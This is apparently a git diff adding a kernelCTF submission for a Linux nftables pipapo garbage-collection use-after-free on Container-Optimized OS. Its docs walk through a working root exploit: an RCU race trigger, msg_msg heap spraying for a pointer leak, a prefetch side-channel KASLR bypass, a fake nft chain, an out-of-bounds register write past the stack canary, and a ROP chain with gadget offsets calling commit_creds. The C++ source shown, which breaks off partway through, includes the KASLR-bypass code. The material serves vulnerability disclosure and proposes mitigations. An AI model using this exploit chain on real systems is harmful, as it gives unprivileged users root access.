diff --git a/pocs/linux/kernelctf/CVE-2026-23351_cos/docs/exploit.md b/pocs/linux/kernelctf/CVE-2026-23351_cos/docs/exploit.md new file mode 100644 index 000000000..f060d49f8 --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2026-23351_cos/docs/exploit.md @@ -0,0 +1,201 @@ +# Exploit + +The pipapo GC UAF is triggered twice. First on a data map to leak a heap pointer via `msg_msg` reclaim, then on a verdict map to hijack `nft_do_chain` into a fake chain. The fake chain abuses `nft_immediate_eval` with an out-of-bounds `dreg` to write a ROP chain over saved registers on the kernel stack, skipping the canary. `commit_creds(init_cred)` + `swapgs; iretq` back to userspace as root. + +~25% per boot (depends on `page_offset_base` alignment), reliable within 4-8 reboots. + +- Vulnerable object: `struct nft_pipapo_elem` (`kmalloc-cg-512`) +- Attacking objects: `struct msg_msg` (heap leak + fake chain), skb data (verdict control) +- Primitive: UAF read for heap infoleak, UAF verdict redirect for code execution + +# Setup + +## Environment + +`unshare(CLONE_NEWUSER | CLONE_NEWNET)` creates a user namespace with `CAP_NET_ADMIN`, required for nftables operations (`nftnl_batch_begin`, `nfnl_send`). The loopback interface is brought up inside the network namespace for IPv6 UDP packet delivery (`::1`). + +## Threading and CPU pinning + +Four threads, pinned to two CPUs: + +- **CPU 0**: main thread (nftables setup + spray), commit thread (triggers `nft_trans_gc_catchall_sync` by toggling dormant flag), spray thread (`msg_msg` / skb allocation) +- **CPU 1**: flood thread (sends IPv6 UDP packets to `::1` triggering `nft_pipapo_lookup` under `rcu_read_lock`), GP-forcer thread (cycles `rcu_read_lock`/`rcu_read_unlock` to advance RCU grace periods) + +Two CPUs are needed because the commit thread on CPU 0 must be inside `vmalloc`'s `cond_resched()` while the flood thread on CPU 1 cycles through RCU read-side critical sections. When all CPUs have reported quiescent states, the RCU grace period completes and `call_rcu` callbacks fire, freeing the element while lookups still reference it. + +## Nftables configuration + +Two pipapo sets in table "t", chain "c" (INET family, `NF_INET_LOCAL_OUT` hook), both with concatenated 2×16-byte IPv6 keys (src+dst): + +- Set "s": data map (`NFT_SET_MAP`). The rule copies the lookup result into `meta mark`, which the flood thread reads back from the received packet via `getsockopt`. Used for the heap leak in Phase 1. +- Set "v": verdict map (`NFT_SET_MAP | NFT_SET_VMAP`). The lookup result is a verdict: `NFT_GOTO` redirects `nft_do_chain` to whatever chain the reclaimed element specifies. Used for code execution in Phase 4. + +66,000 filler elements per set force `pipapo_clone` to exceed `KMALLOC_MAX_SIZE` (4 MB on `x86_64` with `MAX_ORDER=10`): + +- 2 fields × 128 bits with `bb=4` grouping → 32 groups of 16 buckets per field +- `lt_size` per field = 4096 × ceil(66000/64) ≈ 4.03 MB (where 4096 = 32 groups × 16 buckets × 8 bytes/long) +- `kvzalloc(4.03 MB)` exceeds the 4 MB `KMALLOC_MAX_SIZE` limit, falling back to `vmalloc` +- `vmalloc` → `__vmalloc_area_node` → `cond_resched()`, reporting an RCU quiescent state for the current CPU + +# Triggering the vulnerability + +The bug is in `nft_pipapo_commit()` (`net/netfilter/nft_set_pipapo.c`): + +```c +static void nft_pipapo_commit(struct nft_set *set) +{ + struct nft_pipapo *priv = nft_set_priv(set); + struct nft_pipapo_match *new_match, *old; + + pipapo_gc(set, priv->clone); // [1] + new_match = pipapo_clone(priv->clone); // [2] + rcu_assign_pointer(priv->match, new_match); // [3] +} +``` + +At [1], `pipapo_gc` walks the clone's element lists, calls `nft_pipapo_gc_deactivate` on each expired element to mark it dead, then queues the batch via `nft_trans_gc_queue_sync` for deferred freeing through `kfree_rcu`. At [2], `pipapo_clone` allocates new lookup tables. When the total size exceeds `KMALLOC_MAX_SIZE`, `kvzalloc` falls through to `vmalloc`, which calls `cond_resched()` inside `__vmalloc_area_node`. This reports a quiescent state for the current CPU. If all CPUs have gone through a quiescent state (the flood thread on CPU 1 cycles `rcu_read_lock`/`rcu_read_unlock` continuously), the RCU grace period completes and the `kfree_rcu` callbacks from [1] fire, freeing the elements. + +But `rcu_assign_pointer` at [3] hasn't executed yet. Other CPUs still do packet lookups on the OLD match under `rcu_read_lock`, traversing `pipapo_lookup` which indexes into the now-freed element memory. + +The target element has a 2-second timeout. After it expires, the commit thread toggles the chain's dormant flag to trigger `nft_pipapo_commit`. The vmalloc allocation takes ~10-30ms, enough for the RCU GP to complete. + +# Phase 1: Heap leak + +A target element is added to set "s" with a 2-second timeout and 200 bytes of `NFT_SET_EXT_USERDATA`, putting it in `kmalloc-cg-512` (305 bytes total: base `nft_pipapo_elem` + `NFT_SET_EXT_TIMEOUT` + `NFT_SET_EXT_EXPIRATION` + `NFT_SET_EXT_DATA` + userdata padding). + +After expiry, the commit triggers the UAF. + +## Heap spray and reclaim + +`msg_msg` objects are sprayed to reclaim the freed element's slot: +- `msgsnd()` with 464-byte body → `msg_msg` header (48 bytes) + body = 512 bytes → `kmalloc-cg-512` +- 256 message queues × 4 messages each = 1024 spray objects + +When a `msg_msg` lands on the freed element, the pipapo lookup reads the element's extension data at `ext->offset[NFT_SET_EXT_DATA]`. This offset field now overlaps with byte 3 of `msg_msg.m_list.next` (a kernel heap pointer). If `page_offset_base` alignment gives N=0 (probability ~25%), that byte is < 0x10, and `offset[DATA]` points into the `msg_msg` header region, and the lookup reads 8 bytes of `m_list.next` as the "data map result." + +The flood thread on CPU 1 sends IPv6 UDP packets to `::1`. Each packet traverses the `LOCAL_OUT` chain, triggering a pipapo lookup on set "s". The lookup result is copied into the packet's `meta mark`/payload fields by the nft rule, and the flood thread reads it back from the received packet. + +## LIFO drain+refill for stable placement + +After the leak, the `msg_msg` at the leaked address `A` must be replaced with a fake chain. The exploit processes queues one at a time: drain all 4 messages from queue `i` with `msgrcv()`, then immediately refill queue `i` with 4 new messages containing the fake chain payload before moving to queue `i+1`. + +This per-queue interleaving is critical. SLUB's per-cpu freelist is LIFO: freeing 4 objects and immediately reallocating 4 pushes/pops the same slots in reverse order. Batch-draining all 256 queues before any refill would scatter freed slots across the freelist, with intervening kernel allocations stealing them. The interleaved approach keeps the working set small (4 objects) and maximises the probability that the refill lands on the exact same slots, placing the fake chain at the leaked address `A`. + +# Phase 2: KASLR bypass + +EntryBleed / prefetch side-channel (CVE-2022-4543): + +`prefetchnta` on a kernel virtual address behaves differently depending on whether the address is backed by a TLB entry. Mapped `.text` pages show ~131-134 cycle latency; unmapped addresses show ~201+ cycles. The exploit scans 2 MB-aligned addresses across the kernel ASLR range (`0xffffffff80000000` to `0xffffffffc0000000`) and measures `rdtscp`-bracketed `prefetchnta` latency, taking the minimum across 64 rounds per address to filter noise. + +The scan looks for the first pair of consecutive 2 MB-aligned addresses where both show "mapped" latency. This identifies `_stext` (kernel `.text` is >2 MB). A single scan occasionally produces false positives from speculative TLB fills, so the exploit runs 7 independent scans and applies Boyer-Moore majority vote to select the consensus `_stext`. + +Returns `_stext`. All ROP gadgets and kernel symbols are computed as fixed offsets from `_stext`. + +# Phase 3: Place fake chain + +With heap leak address `A` from Phase 1, the fake chain is placed at `A+48` (inside `msg_msg.mtext`). The +48 offset skips the `msg_msg` header (48 bytes: `m_list` 16 + `m_type` 8 + `m_ts` 8 + `next` 8 + `security` 8), landing at the start of the user-controlled message body. All pointers within the fake chain reference `A+48+N` offsets, making the entire structure self-contained within a single `msg_msg` object. + +Layout of the fake chain at `A+48`: + +``` +Offset Content Purpose +------ ------- ------- +[0-7] blob_gen_0 = A+48+16 nft_chain.blob_gen_0 → rule blob +[8-15] blob_gen_1 = A+48+16 nft_chain.blob_gen_1 → rule blob +[16-23] nft_rule_blob: { size=256, pad=0 } rule blob header +[24-31] rule_dp: { is_last=0, dlen=64 } 2 expressions × 32 bytes each +[32-39] expr 1 ops = A+48+300 → nft_immediate_eval +[40-55] expr 1 priv.data = {0xFFFFFFFF, 0, 0, 0} NFT_CONTINUE at data[0] +[56-63] expr 1 priv: dreg=0, dlen=4, padding +[64-71] expr 2 ops = A+48+300 → nft_immediate_eval +[72-87] expr 2 priv.data = {0, 0} 136-byte copy source starts here (rbx=0, rbp=0) +[88-95] expr 2 priv: dreg=54, dlen=136, padding dreg/dlen land in saved r12 (harmless) +[96-207] expr 2 copy payload (bytes 24-135) saved r13-r15, return addr, iret frame +[208-299] (padding) +[300-319] fake nft_expr_ops: eval=nft_immediate_eval embedded ops struct +``` + +The fake `nft_expr_ops` at `mtext[300]` sets `eval` to `nft_immediate_eval` (`_stext + 0x12323d0`), `size = 32`, everything else zeroed. This avoids needing the address of the real `nft_imm_ops` in kernel `.data`, so the fake ops struct is self-contained in the `msg_msg` payload. + +Both expressions point to this same fake ops struct. Expression 1 writes `NFT_CONTINUE` (0xFFFFFFFF) to `regs->data[0]` (the verdict register), clearing the stale `NFT_GOTO` so the eval loop proceeds to expression 2. Expression 2 calls `nft_immediate_eval` with `dreg=54` and `dlen=136`, which is the novel OOB write technique (see `novel-techniques.md`). + +# Phase 4: Verdict map UAF + code execution + +A target element is added to verdict map set "v" (2-second timeout, `kmalloc-cg-512`). After expiry, a commit triggers the UAF on the verdict map. + +## Verdict reclaim via `AF_UNIX` skb + +`msg_msg` is not used for Phase 4 because the verdict map lookup reads different extension offsets than the data map, and the `msg_msg` header layout doesn't align well with the required `NFT_SET_EXT_DATA` offset for a verdict. Instead, `AF_UNIX` `SOCK_DGRAM` provides fine-grained control over the reclaimed object's contents. + +`socketpair(AF_UNIX, SOCK_DGRAM)` + `write(sv[0], payload, 192)` creates an skb with `skb->head` allocated from `kmalloc-cg-512` (192 bytes data + 320 bytes `skb_shared_info` = 512 bytes). The full 192-byte payload is attacker-controlled, starting at `skb->data`. + +The payload is crafted so the reclaimed element appears valid to `pipapo_lookup`: + +- `ext->genmask = 0` (passes generation check in `nft_pipapo_lookup`) +- `ext->offset[NFT_SET_EXT_DATA] = 16` (points into controlled region within the skb data) +- `ext->offset[NFT_SET_EXT_EXPIRATION] = 160` (points far enough into the buffer that the expiration timestamp reads as a large future value, passing the timeout check) +- At payload offset 16: `verdict.code = NFT_GOTO`, `verdict.chain = A + 48` (the fake chain address from Phase 1) + +When the flood thread's packet triggers a lookup on set "v", the verdict resolves to `NFT_GOTO` with the fake chain pointer. `nft_do_chain` follows the GOTO into the fake chain at `A+48`, entering the expression eval loop with attacker-controlled expressions. + +## Stack layout proof + +`nft_do_chain` prologue on COS-121 (6.6.122, objdump of vmlinux): + +``` +nft_do_chain: + push %r15 + push %r14 + push %r13 + push %r12 + push %rbp + push %rbx + sub $0xf8, %rsp // [1] frame size = 0xf8 + ... + lea 0x20(%rsp), %r12 // [2] regs = rsp + 0x20 +``` + +From [1] and [2]: `regs` is at `rsp+0x20`. The stack canary is at `rsp+0xf0` (stored from `%gs:0x28` after the `sub`). Saved `rbx` starts at `rsp+0xf8`. + +`dreg=54` → byte offset `54 × 4 = 0xd8` from `regs` → absolute position `rsp + 0x20 + 0xd8 = rsp + 0xf8`, exactly the first saved callee register, 8 bytes PAST the canary. + +## ROP chain + +| Stack position | Value | Symbol / Gadget | +|---------------|-------|-----------------| +| `rsp+0xf8` | 0 | saved rbx | +| `rsp+0x100` | 0 | saved rbp | +| `rsp+0x108` | (dreg/dlen) | saved r12 (harmless) | +| `rsp+0x110` | 1 | saved r13 | +| `rsp+0x118` | 0 | saved r14 | +| `rsp+0x120` | 0 | saved r15 | +| `rsp+0x128` | `_stext+0x160db4` | `pop rdi; ret` (`native_write_cr4+0x34`) | +| `rsp+0x130` | `_stext+0x2e72f20` | `&init_cred` | +| `rsp+0x138` | `_stext+0x1ffbe0` | `commit_creds` | +| `rsp+0x140` | `_stext+0x1601949` | `swapgs_restore_regs_and_return_to_usermode+0x99` (pop rax; pop rdi; swapgs; KPTI CR3 restore; iretq) | +| `rsp+0x148` | 0 | rax pad | +| `rsp+0x150` | 0 | rdi pad | +| `rsp+0x158` | `user_rip` | shell function address | +| `rsp+0x160` | 0x33 | user CS | +| `rsp+0x168` | `user_rflags` | saved RFLAGS | +| `rsp+0x170` | `user_rsp` | user stack pointer | +| `rsp+0x178` | 0x2b | user SS | + +`nft_do_chain` returns through its epilogue (`pop rbx; pop rbp; pop r12; pop r13; pop r14; pop r15; ret`), pops the overwritten values, and `ret` lands on `pop rdi; ret`. The chain runs `commit_creds(init_cred)`, then `swapgs_restore_regs_and_return_to_usermode+0x99` performs `swapgs`, traverses the KPTI return trampoline, and `iretq` returns to userspace with the iret frame at `rsp+0x148`. `execl("/bin/sh")` gives a root shell. + +# Stability + +| Component | Success rate | Notes | +|-----------|-------------|-------| +| `page_offset_base` alignment | ~25% per boot | N=0 mod 4 required (see below) | +| Prefetch KASLR | ~95% per trial | 7-trial Boyer-Moore majority vote | +| Heap reclaim (`msg_msg`) | >90% | Interleaved per-queue LIFO drain+refill | +| Verdict reclaim (skb) | >95% | `AF_UNIX` skb same cache, allocated on-demand | +| End-to-end per boot | ~20% | Dominated by alignment requirement | + +The `page_offset_base` constraint: the heap leak reads byte 3 of `msg_msg.m_list.next` as `ext->offset[NFT_SET_EXT_DATA]`. The physical-to-virtual mapping randomises the upper bits of heap pointers. When `page_offset_base & 0xFF00000000 == 0`, byte 3 is < 0x10, producing a valid `offset[DATA]` pointing into the `msg_msg` header where the full 8-byte pointer is readable. Other alignments produce `offset[DATA]` > 0x10, pointing outside the object. The exploit detects this (no valid leak after 100 packets) and exits with code 2, signalling the wrapper script to reboot and retry. + +With a 20% per-boot success rate, 8 independent boots give `1 - 0.8^8 ≈ 83%` cumulative probability. In practice, root is achieved within 4-8 reboots. The exploit exits with distinct codes: +- 0 = root shell obtained +- 1 = unrecoverable error (spray failure, KASLR mismatch) +- 2 = alignment check failed (retry on next boot) diff --git a/pocs/linux/kernelctf/CVE-2026-23351_cos/docs/novel-techniques.md b/pocs/linux/kernelctf/CVE-2026-23351_cos/docs/novel-techniques.md new file mode 100644 index 000000000..b4860d19a --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2026-23351_cos/docs/novel-techniques.md @@ -0,0 +1,72 @@ +# `nft_immediate_eval` OOB dreg write + +## Problem + +After gaining a UAF on an nft set element and redirecting `nft_do_chain` to a fake chain on the heap, the standard next step is a stack pivot to a controlled ROP chain. On COS-121 (6.6.122), this fails: + +- `.text` has no usable `xchg rsp, rXX`, `mov rsp, [rXX]`, or `push rXX; pop rsp` gadgets (checked via raw byte search for `48 94`, `48 87 xx`, `5c`, and `53 5c` across the full 19MB .text; occurrences exist but all are mid-instruction or followed by immediate faults) +- At the `expr->ops->eval` call site, RDI points to the fake expression (heap) but no other general-purpose register holds a controlled heap address; `push rdi; pop rsp` (`57 5c`) has no usable occurrence either +- `.rodata` is on a separate 2MB page, mapped NX, so no jump to data there + +Without a stack pivot, the attacker has code execution via `nft_do_chain`'s expression eval loop but no way to run a ROP chain. + +## Technique + +`nft_immediate_eval` performs an unchecked `memcpy` from expression data into `regs->data[dreg]`: + +```c +static void nft_immediate_eval(const struct nft_expr *expr, + struct nft_regs *regs, ...) +{ + const struct nft_immediate_expr *priv = nft_expr_priv(expr); + nft_data_copy(®s->data[priv->dreg], &priv->data, priv->dlen); // [1] +} +``` + +At [1], `dreg` (u8) is a u32 array index and `dlen` (u8) is the byte count. Neither is bounds-checked at eval time. Validation happens at rule install time in `nft_parse_register_store`, but this is bypassed because the expressions come from a fake chain on the heap, not from netlink. + +In `nft_do_chain`, `regs` is a local variable on the stack at `rsp+0x20`. The stack canary is at `rsp+0xf0`, saved callee registers start at `rsp+0xf8`. A fake expression with `dreg=54` writes starting at byte offset `54 × 4 = 0xd8` from `regs`, landing at `rsp+0xf8`, 8 bytes past the canary. With `dlen=136`, this covers saved `rbx` through `r15`, the return address, and a full ROP payload + iret frame. + +The fake chain needs two expressions: +1. Reset the verdict register (`regs->data[0]`) to `NFT_CONTINUE`, since the eval loop would otherwise re-enter GOTO handling from the stale verdict +2. OOB write with `dreg=54`, `dlen=136` containing the ROP chain + +When `nft_do_chain` returns through its epilogue (`pop rbx; pop rbp; pop r12-r15; ret`), the overwritten return address starts the ROP chain. The canary check passes because `dreg=54` starts past it. + +## Prior art + +No prior kernelCTF submission uses this technique. Prior nft-based exploits either: +- Corrupt a function pointer in an nft object (e.g. `nft_expr_ops.eval`) and pivot to a heap ROP chain (requires a stack pivot gadget) +- Use page-level attacks (DirtyPagetable, `pipe_buffer` page UAF), which require different bug primitives +- Use `modprobe_path` / `core_pattern` overwrites, blocked by read-only mounts on COS + +The OOB dreg write is distinct: the `expr->ops->eval` indirect call targets the real `nft_immediate_eval` function, whose own `memcpy` writes the ROP chain directly onto the kernel stack. No branch to arbitrary code, no stack pivot needed. + +## Why the canary doesn't help + +Stack canaries protect against linear buffer overflows that start below the canary and overwrite upwards. The OOB dreg write starts at `dreg=54` which corresponds to `rsp+0xf8`, 8 bytes ABOVE the canary at `rsp+0xf0`. The canary bytes (indices 52-53) are never touched. The epilogue's `__stack_chk_fail` check passes because the canary is intact. + +Canaries only detect contiguous overwrites from below. A write with an attacker-controlled starting offset bypasses them. + +## Generalisability + +The technique applies wherever: +1. An eval/dispatch loop stores a register file on the stack +2. Expression/instruction data comes from attacker-controlled memory +3. The register index and write length are validated at load time but not at eval time + +The `dreg` value is target-specific. To compute it for a given kernel: +``` +dreg = (saved_regs_offset - regs_offset) / sizeof(u32) + = (canary_offset + 8 - regs_offset) / 4 +``` +On COS-121: `(0xf8 - 0x20) / 4 = 54`. On other kernels, check `nft_do_chain`'s `sub $N, %rsp` and `lea M(%rsp), %rREGS` in the prologue. + +Beyond nftables, the same pattern could apply to any kernel interpreter that stores a scratch register file on the stack and dispatches attacker-influenced instructions, e.g. a custom VM in a kernel module or any expression evaluator where operand indices are validated at load time but not at eval time. + +## Proposed mitigations + +1. **Bounds-check dreg at eval time**: `if (priv->dreg + priv->dlen/4 > NFT_REG32_COUNT) return;` in `nft_immediate_eval`. Low overhead (~2 instructions). +2. **Move regs off the stack**: allocate `nft_regs` on the heap or in a per-CPU area, so OOB writes can't reach saved registers. +3. **Compiler-based stack layout randomisation**: randomise the relative position of local variables and saved registers, making `dreg` calculation target-specific and unpredictable. +4. **Validate fake chain pointers**: `nft_do_chain` could verify that `chain->blob_gen_X` points into a valid nft allocation, not arbitrary heap memory. diff --git a/pocs/linux/kernelctf/CVE-2026-23351_cos/docs/vulnerability.md b/pocs/linux/kernelctf/CVE-2026-23351_cos/docs/vulnerability.md new file mode 100644 index 000000000..0e31f14ed --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2026-23351_cos/docs/vulnerability.md @@ -0,0 +1,42 @@ +# Vulnerability details + +- **Requirements**: + - **Capabilities**: `CAP_NET_ADMIN` + - **Kernel configuration**: `CONFIG_NF_TABLES` + - **User namespaces required**: Yes +- **Introduced by**: https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=3c4287f6204483683a16e8b1fb9f4164fb70e2e4 +- **Fixed by**: https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=9df95785d3d8302f7c066050117b04cd3c2048c2 +- **Affected Version**: `5.6 - 6.14` +- **Affected Component**: `net/netfilter: nft_set_pipapo` +- **Syscall to disable**: `unshare` +- **Cause**: Use-After-Free +- **Description**: Use-after-free in `nft_pipapo_commit()`. `pipapo_gc()` marks expired elements dead and queues them for deferred freeing via `kfree_rcu`, while `pipapo_clone()` allocates new lookup tables. When the table exceeds `KMALLOC_MAX_SIZE`, `kvzalloc` falls back to `vmalloc` which calls `cond_resched()`, completing the RCU grace period and firing the kfree callbacks. But `rcu_assign_pointer()` hasn't executed yet, so packet lookups on other CPUs still dereference freed elements through the old match. + +# Vulnerability analysis + +The bug is in `net/netfilter/nft_set_pipapo.c`, function `nft_pipapo_commit()`: + +```c +static void nft_pipapo_commit(struct nft_set *set) +{ + struct nft_pipapo *priv = nft_set_priv(set); + struct nft_pipapo_match *new_match, *old; + + pipapo_gc(set, priv->clone); // [1] marks expired elements dead, queues for kfree_rcu + + new_match = pipapo_clone(priv->clone); // [2] kvzalloc -> vmalloc -> cond_resched() + + rcu_assign_pointer(priv->match, new_match); // [3] publish new match +} +``` + +Between [1] and [3], `vmalloc`'s `cond_resched()` at [2] reports a quiescent state for the current CPU. If all CPUs have gone through a quiescent state, the RCU grace period completes and the `kfree_rcu` callbacks queued by [1] fire, freeing the elements. But `rcu_assign_pointer` at [3] hasn't happened yet, so other CPUs are still doing packet lookups on the old match under `rcu_read_lock()` and end up dereferencing freed memory. + +To force the vmalloc path, ~66,000 elements with 32-byte concatenated keys are needed: +- 2 fields × 128 bits, `bb=4` grouping +- `lt_size` per field = 4096 × ceil(66000/64) ≈ 4.03 MB +- Exceeds `KMALLOC_MAX_SIZE` (4 MB on `x86_64` with `MAX_ORDER=10`) + +The target element has a 2s timeout. After it expires, a commit is triggered so `pipapo_gc` frees it. The vmalloc allocation takes ~10-30ms, enough for the RCU GP to complete if the flood thread on another CPU is cycling through `rcu_read_lock()`/`rcu_read_unlock()`. + +The fix (commit 9df95785d3d8) splits GC into unlink and reclaim phases, deferring element destruction until after `rcu_assign_pointer` installs the new match. diff --git a/pocs/linux/kernelctf/CVE-2026-23351_cos/exploit/cos-121-18867.381.30/Makefile b/pocs/linux/kernelctf/CVE-2026-23351_cos/exploit/cos-121-18867.381.30/Makefile new file mode 100644 index 000000000..200d87c07 --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2026-23351_cos/exploit/cos-121-18867.381.30/Makefile @@ -0,0 +1,10 @@ +all: exploit + +exploit: exploit.cpp + g++ -std=c++17 -static -O2 -o exploit exploit.cpp -lkernelXDK -lpthread + +exploit_debug: exploit.cpp + g++ -g1 -std=c++17 -static -O2 -o exploit_debug exploit.cpp -lkernelXDK -lpthread + +run: + ./exploit diff --git a/pocs/linux/kernelctf/CVE-2026-23351_cos/exploit/cos-121-18867.381.30/exploit b/pocs/linux/kernelctf/CVE-2026-23351_cos/exploit/cos-121-18867.381.30/exploit new file mode 100755 index 000000000..3d4734df2 Binary files /dev/null and b/pocs/linux/kernelctf/CVE-2026-23351_cos/exploit/cos-121-18867.381.30/exploit differ diff --git a/pocs/linux/kernelctf/CVE-2026-23351_cos/exploit/cos-121-18867.381.30/exploit.cpp b/pocs/linux/kernelctf/CVE-2026-23351_cos/exploit/cos-121-18867.381.30/exploit.cpp new file mode 100644 index 000000000..387735e0a --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2026-23351_cos/exploit/cos-121-18867.381.30/exploit.cpp @@ -0,0 +1,2118 @@ +/* + * pipapo GC UAF PoC — deterministic vmalloc approach + * + * On COS-121: MAX_ORDER=10 → KMALLOC_MAX_SIZE=4MB. + * With two 16-byte fields (IPv6 src+dst) and 66K elements: + * - bb switches from 8→4 at ~4K rules + * - At bb=4: groups=32, lt_size = 4096 * ceil(N/64) per field + * - For N=66000: lt_size ≈ 4.03MB > 4MB = KMALLOC_MAX_SIZE + * - kvzalloc in pipapo_clone → kmalloc FAILS → vmalloc + * - vmalloc has cond_resched → RCU quiescent state reported + * - RCU grace period completes → call_rcu callbacks fire → elements kfree'd + * - But rcu_assign_pointer (match swap) hasn't happened yet + * - Packet lookups still use OLD live match → access freed element memory → UAF + * + * No memory fragmentation needed — this is deterministic. + * + * Target element layout (kmalloc-cg-512, 305 bytes with USERDATA): + * [0-15] nft_set_ext header (genmask + offset[9] + padding) + * [16-47] KEY (32B: src_ipv6 ++ dst_ipv6) + * [48-79] KEY_END (32B) + * [80-87] DATA (8B) + * [88-95] TIMEOUT (8B) + * [96-103] EXPIRATION (8B) + * [104-304] USERDATA (1B len + 200B data) → pushes to kmalloc-cg-512 + * + * Filler element layout (kmalloc-cg-128, 104 bytes): + * Same as above minus USERDATA + * + * After kfree: SLUB freelist pointer at s->offset corrupts some field. + * If s->offset=0: ext header corrupted → offset table wrong → + * nft_set_elem_expired reads from wrong location → returns false → + * lookup proceeds → data read from wrong offset → changed value = UAF. + */ + +#include +#include + +INCBIN(target_db, "target_db.kxdb"); +__asm__(".text\n"); + +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include + +#include +/* ====== KASLR bypass via prefetch side-channel (Intel) ====== + * Based on "Prefetch Side-Channel Attacks" by Daniel Gruss et al. + * Used by ~60% of kernelCTF submissions. Works through KPTI. + * prefetchnta on mapped kernel pages shows different timing than unmapped. */ + +inline __attribute__((always_inline)) uint64_t rdtsc_begin(void) { + uint64_t a, d; + asm volatile("mfence\n\t" + "RDTSCP\n\t" + "mov %%rdx, %0\n\t" + "mov %%rax, %1\n\t" + "xor %%rax, %%rax\n\t" + "lfence\n\t" + : "=r" (d), "=r" (a) : : "%rax", "%rbx", "%rcx", "%rdx"); + return (d << 32) | a; +} + +inline __attribute__((always_inline)) uint64_t rdtsc_end(void) { + uint64_t a, d; + asm volatile("xor %%rax, %%rax\n\t" + "lfence\n\t" + "RDTSCP\n\t" + "mov %%rdx, %0\n\t" + "mov %%rax, %1\n\t" + "mfence\n\t" + : "=r" (d), "=r" (a) : : "%rax", "%rbx", "%rcx", "%rdx"); + return (d << 32) | a; +} + +static size_t flushandreload(void *addr) { + size_t time = rdtsc_begin(); + asm volatile("prefetchnta (%0)\nprefetcht2 (%0)\n" : : "r" (addr)); + return rdtsc_end() - time; +} + +/* Prefetch side-channel KASLR bypass. + * Kernel text pages show distinctly LOWER prefetch latency (~131-134 cycles) + * vs unmapped pages (~201-209 cycles) in this KVM environment. + * Algorithm: measure all 2MB-aligned addresses, find the first address with + * timing significantly below the unmapped baseline → that's _stext. */ +#define KASLR_START 0xffffffff81000000ULL +#define KASLR_END 0xffffffffc0000000ULL +#define KASLR_STEP 0x0000000000200000ULL /* 2MB */ +#define KASLR_NADDR ((KASLR_END - KASLR_START) / KASLR_STEP) +#define KASLR_ROUNDS 64 +#define KASLR_TRIALS 7 + +static uint64_t bypass_kaslr(void) { + uint64_t results[KASLR_TRIALS]; + + for (int trial = 0; trial < KASLR_TRIALS; trial++) { + size_t times[KASLR_NADDR]; + for (int i = 0; i < (int)KASLR_NADDR; i++) + times[i] = ~(size_t)0; + + /* Warmup pass */ + for (int i = 0; i < (int)KASLR_NADDR; i++) + flushandreload((void *)(KASLR_START + KASLR_STEP * (uint64_t)i)); + + /* Measure: take minimum across rounds (filters noise) */ + for (int round = 0; round < KASLR_ROUNDS; round++) { + for (int i = 0; i < (int)KASLR_NADDR; i++) { + size_t t = flushandreload((void *)(KASLR_START + KASLR_STEP * (uint64_t)i)); + if (t < times[i]) times[i] = t; + } + } + + /* Find global minimum (= kernel .text timing) */ + size_t min_val = ~(size_t)0; + for (int i = 0; i < (int)KASLR_NADDR; i++) + if (times[i] < min_val) min_val = times[i]; + + /* Threshold: min + 20 cycles. Kernel .text is ~131-138, unmapped is ~201+. + * This captures the .text band with huge margin from unmapped. */ + size_t threshold = min_val + 20; + + /* Find first pair of consecutive addresses below threshold → _stext */ + results[trial] = 0; + for (int i = 0; i < (int)KASLR_NADDR - 1; i++) { + if (times[i] <= threshold && times[i + 1] <= threshold) { + results[trial] = KASLR_START + KASLR_STEP * (uint64_t)i; + break; + } + } + printf("[*] KASLR trial %d: min=%zu thr=%zu → 0x%lx\n", + trial, min_val, threshold, (unsigned long)results[trial]); + } + + /* Boyer-Moore majority vote */ + uint64_t candidate = 0; + int count = 0; + for (int i = 0; i < KASLR_TRIALS; i++) { + if (count == 0) { candidate = results[i]; count = 1; } + else if (candidate == results[i]) count++; + else count--; + } + count = 0; + for (int i = 0; i < KASLR_TRIALS; i++) + if (results[i] == candidate) count++; + + if (count > KASLR_TRIALS / 2 && candidate != 0) { + printf("[+] KASLR bypass: _stext = 0x%lx (%d/%d votes)\n", + (unsigned long)candidate, count, KASLR_TRIALS); + return candidate; + } + + printf("[-] KASLR majority vote failed (%d/%d for 0x%lx)\n", + count, KASLR_TRIALS, (unsigned long)candidate); + return 0; +} + +#if __BYTE_ORDER == __BIG_ENDIAN +#define H32(x) (x) +#else +#define H32(x) __bswap_32(x) +#endif + +#ifndef NLA_F_NESTED +#define NLA_F_NESTED (1 << 15) +#endif +#ifndef SOL_NETLINK +#define SOL_NETLINK 270 +#endif +#ifndef NFNL_MSG_BATCH_BEGIN +#define NFNL_MSG_BATCH_BEGIN 0x10 +#endif +#ifndef NFNL_MSG_BATCH_END +#define NFNL_MSG_BATCH_END 0x11 +#endif +#ifndef NFT_SET_INTERVAL +#define NFT_SET_INTERVAL 0x04 +#endif +#ifndef NFT_SET_MAP +#define NFT_SET_MAP 0x08 +#endif +#ifndef NFT_SET_TIMEOUT +#define NFT_SET_TIMEOUT 0x10 +#endif +#ifndef NFT_SET_CONCAT +#define NFT_SET_CONCAT 0x80 +#endif +#ifndef NFTA_PAYLOAD_DREG +#define NFTA_PAYLOAD_DREG 1 +#define NFTA_PAYLOAD_BASE 2 +#define NFTA_PAYLOAD_OFFSET 3 +#define NFTA_PAYLOAD_LEN 4 +#endif +#ifndef NFT_PAYLOAD_NETWORK_HEADER +#define NFT_PAYLOAD_NETWORK_HEADER 1 +#endif +#ifndef NFT_PAYLOAD_TRANSPORT_HEADER +#define NFT_PAYLOAD_TRANSPORT_HEADER 2 +#endif +#ifndef NFT_REG_1 +#define NFT_REG_1 1 +#endif +#ifndef NFT_REG_2 +#define NFT_REG_2 2 +#endif +#ifndef NFT_REG_3 +#define NFT_REG_3 3 +#endif +#ifndef NFT_REG32_00 +#define NFT_REG32_00 8 +#define NFT_REG32_01 9 +#endif +#ifndef NFTA_LOOKUP_DREG +#define NFTA_LOOKUP_DREG 3 +#endif +#ifndef NFTA_PAYLOAD_SREG +#define NFTA_PAYLOAD_SREG 5 +#endif +#ifndef NFTA_SET_ELEM_USERDATA +#define 